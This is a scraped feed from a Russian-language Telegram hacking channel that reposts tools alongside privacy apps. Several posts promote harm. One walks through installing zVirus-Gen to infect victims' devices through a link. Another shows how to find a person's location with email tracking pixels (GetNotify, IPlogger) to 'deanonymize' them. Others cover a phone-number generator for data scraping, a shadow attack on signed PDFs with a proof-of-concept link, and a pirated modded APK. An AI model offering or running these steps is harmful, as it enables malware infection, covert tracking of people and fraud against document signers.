C.I.T. Security
8.29K subscribers
2.93K photos
268 videos
4.22K files
4.22K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://t.me/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
phonerator - инструмент от создателя утилиты email2phonenumber, позволяющий генерировать реально существующие номера телефонов по маске. Поддерживает фильтрацию по местоположению и оператору, а также экспорт в .vcf для дальнейшего импорта в телефонную книгу.

Создан, в том числе, для "извлечения общедоступных сведений с некоторых платформ, используя их особенности" https://about.fb.com/news/2021/04/facts-on-news-reports-about-facebook-data/ 😅

Пока что только американские номера.
Shadow Attacks Hiding and Replacing Content in Signed PDFs.pdf
1.3 MB
Подробности реализации теневых атак на PDF-документы.

Позволяют изменять визуальное содержимое подписанных электронной подписью PDF, не "ломая" при этом саму подпись.

Реализуются следующим образом. Злоумышленник создает документ с двумя различными содержаниями: первое - содержимое, которое ожидается стороной, подписывающей документ, второе - то, что должна увидеть жертва при открытии. В PDF также вставляется вредоносный JS-код, отвечающий за подмену легитимного содержимого и биндится, например, на закрытие файла.

Сторона, отвечающая за подпись, открывает файл, видит легитимное содержимое, и подписывает его. Перед самым закрытием, срабатывает код и подменяет визуальное содержимое на то, что увидит жертва. PDF-файл отправляется обратно к злоумышленнику и тот использует его уже по своему назначению.

Подробности публично представлены в феврале. Подвержены 16 средств для просмотра PDF, в том числе Adobe Acrobat, Perfect PDF, Foxit Reader и Okular.

PoC: https://github.com/RUB-NDS/pdf-attacker
Прячем лицо от ИИ с помощью Termux

Fawkes - это система защиты конфиденциальности, разработанная исследователями из SANDLab Чикагского университета.

Установка

Обновим пакеты:
apt update -y
apt upgrade -y

Качаем гит и питон:
apt install git
apt install python

Теперь сам инструмент:
git clone https://github.com/Shawn-Shan/fawkes

Открываем папку:
cd fawkes

Теперь нужно его установить:
python setup.py install

Кидаем фотку в любую папку и вот так вот запускаем:
fawkes -d директория/к/папке/с/фотками --mode min

Теперь ни один ИИ не распознает ваше лицо ✌️
Скрипт на автоматизацию действий ВКонтакте для Termux

Айо, бандиты. Перед вами отличный бесплатный скрипт, который позволит: добавить друзей со стен/страниц, добавить друзей из рекомендаций, принять новые заявки в друзья, принять все заявки в друзья, отписаться от всех исходящих заявок, удалить неактивных друзей, удалить невидимых друзей, удалить собак из друзей, удалить всех друзей.

pkg update -y
pkg upgrade -y
install git
apt update && apt upgrade -y apt install git python
termux-setup-storage
git clone https://github.com/Matazimov/VK
cd VK
pip install -r requirements.txt
(Если вылезет ошибка, то вводим это: pip install --upgrade pip только без cd VK)

Запуск

python start.py

Далее нас просят ввести токен ВКонтакте. После авторизации мы попадаем на пустой сайт, там копируем свой токен и вставляем в Termux. После выхода из термукса, чтобы запустить этот скрипт снова вводим эти команды:

cd VK
python start.py
И вставляем свой токен

Мастхэв для арбитража в Вконтактике ✌️
👍1
Заражаем устройства пользователей по ссылке

zVirus - утилита, включающая в себя множество вирусов для различных ос.

Установка:

apt update

apt install git -y

git clone https://github.com/ZechBron/zVirus-Gen

Использование

cd zVirus-Gen

bash setup.sh

bash zVirus

После чего выбираем ос и вирус, который нам по душе. Утилита выдаст нам ссылку, при переходе на которую начнется установка выбранного вируса ✌️
xa-263.pdf
30.1 MB
Журнал: Xakep
Номер: 263
Год: 2021
Месяц: Февраль
Swisscows — частная поисковая система с нулевым отслеживанием, базирующаяся в Швейцарии и размещенная на защищенной швейцарской инфраструктуре.

#сайт #сервис
Ruin My Search History — анти-Google утилита, которая путает и «портит» историю ваших поисковых запросов в гугле. Генерируя случайные поисковые запросы, этот инструмент не позволяет Google создать точную картину того, кто вы есть.

Можно поставить 150 рандомных запросов.

Разумеется, инструмент будет полезен только для тех, кто прибегает к поиску Google. Надеюсь
, что большинство моей аудитории использует такие поисковые системы как searX, Qwant, Mojeek, YaCy и другие приватные альтернативы.

#сайт #сервис
👍1
Fennec F-Droid — форк браузера Mozilla Firefox для Android, заточенный на приватность.

— Встроенная блокировка более чем 2000 он-лайн трекеров
— Режим приватного сёрфинга веб-страниц
— Есть тёмная тема
— Режим "картинка в картинке"

#приложение #браузер #Android
Подборка безопасных мессенджеров. Часть 1.

🔓 ChatSecure — бесплатный открытый клиент для обмена сообщений с поддержкой OTR-шифрования по протоколу XMPP. Для iOS.

🤫 Silence — мессенджер, который предназначен для обмена зашифрованными SMS и MMS сообщениями.

🌠 Adamant — анонимный и защищённый мессенджер, работающий на блокчейне Ethereum.

👾 GoTor Messenger — безопасный мессенджер, работающий через Tor сеть.

🔥 FireChat — один оффлайн мессенджер для пользователей Android. Использует для связи Wi-Fi + Bluetooth, имеет встроенное сквозное шифрование сообщений.

#мессенджер #анонимность
👍1
systemrescue-8.01-amd64.iso
708 MB
#софт

SystemRes
cue 8

Это спасательный диск в системе Linux в качестве загрузочного компакт-диска или USB Stick для администрирования или восстановления системы и данных после сбоя. Его целью является обеспечить простой способ для выполнения задач администратора на компьютере, таких как создание и редактирование разделов на жестком диске.
kino.hd-3.0.3-arm7.apk
3.8 MB
Kino.HD версии 3.0.3

Очень модный клиент онлайн кинотеатра. Множество фильмов, сериалов, трейлеров. Абсолютно бесплатно. Способен искать фильмы и сериалы во множестве источников. Работает весьма быстро. Удобный интерфейс. Рекомендую 👍
В модификации получен PREMIUM, удалена аналитика и реклама 😁

Требуется: Андроид 4.1+
👍1
Пробиваем местоположение человека с помощью почты

Метод, показанный в этом посте, уже очень давно используется на западе, но в странах СНГ он только набирает свои обороты.

Для получения местоположения человека с помощью почты существует достаточно много утилит, инструментов и программ, сейчас будет рассмотрен инструмент - GetNotify.

GetNotify - это абсолютно бесплатный инструмент для отслеживания местоположения человека с помощью электронной почты.

Данный сервис работает принципом добавления невидимого изображения (т.е трекера) в исходящие письмо. После открытия письма, изображение загружается с сервера GetNotify.

В том случае, если вы не доверяете сторонним сервисам, то воспользуйтесь инструментом IPlogger, с помощью него можно с лёгкостью создать изображение с внедрением трекера.

▫️https://www.getnotify.com/
▫️https://iplogger.org/

Всем сочных деанончиков ✌️
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
MPatcher (Android)

Редактирование и выполнение bash-скриптов.

Скачать